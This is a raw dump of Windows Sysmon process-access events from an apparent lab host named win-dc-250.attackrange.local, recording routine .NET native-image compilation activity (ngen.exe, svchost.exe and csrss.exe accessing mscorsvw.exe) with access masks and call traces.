13:25:36.821{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-DA03-000000009A01}4468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.774{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D903-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.759{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D903-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.759{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D903-000000009A01}4108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.727{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D803-000000009A01}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.712{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D803-000000009A01}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.712{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D803-000000009A01}1156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.681{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D703-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.665{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D703-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.665{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D703-000000009A01}4568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.602{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D603-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.587{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D603-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.587{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D603-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008016Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.477{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D503-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008015Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.446{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D503-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008014Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.446{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D503-000000009A01}2032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008013Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.243{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D403-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008012Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.227{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D403-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008011Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.227{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D403-000000009A01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.149{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4650-6000-D303-000000009A01}1616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.134{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4650-6000-D303-000000009A01}1616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:36.118{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4650-6000-D303-000000009A01}1616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 